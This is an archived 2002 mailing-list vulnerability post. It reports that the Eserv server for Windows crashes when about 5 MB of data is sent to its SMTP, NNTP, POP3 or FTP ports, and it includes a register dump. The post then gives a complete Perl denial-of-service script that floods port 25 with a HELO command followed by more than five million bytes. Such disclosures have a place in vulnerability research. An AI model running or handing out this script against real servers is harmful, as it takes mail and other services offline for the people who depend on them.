hi Eserv is Mail, News, Web, FTP and Proxy Servers for Win95/98/NT/2000 (http://www.eserv.ru/) Eserv is vulnerable has an attack back by sending a buffer of 5M of Data with port 119 or 25 or 110 or 21 with a buffer of 5080000 byte , version tested: v2.97, v2.99 (possible all version are vulnerable) one has the following error: l insructio a "0x0000fde8" emploie l'adresse memoire "0x0000fde8" la memoire e peut pas etre "read" the state of the registers is: eax=c0000000 ebx=004c3ed5 ecx=0000fde8 edx=002f0608 esi=004fc17e edi=003bb358 eip=0000fde8 esp=0189efa4 ebp=0189ff54 iopl=0 nv up ei pl nz ac pe nc cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000212 0000fde8 ?? ??? while adding a few bytes to the buffer the programe falls without any message exploit: #!/usr/bin/perl -w #greetz: marocit #tool Eserv_dos.pl use IO::Socket; $buffer = "A"x 5080000 ; $hel = "HELO " $connect = IO::Socket::INET ->new (Proto=>"tcp", PeerAddr=> "$ARGV[0]", PeerPort=>"25"); unless ($connect) { die "cant connect $ARGV [0]" } print $connect "$hel$buffer"; print "\nsending exploit......\n\n"; securma massine _________________________________________________________ Gagne une PS2 ! Envoie un SMS avec le code PS au 61166 (0,35€ Hors coût du SMS)
This archive was generated by hypermail 2b30 : Fri Dec 13 2002 - 08:31:09 PST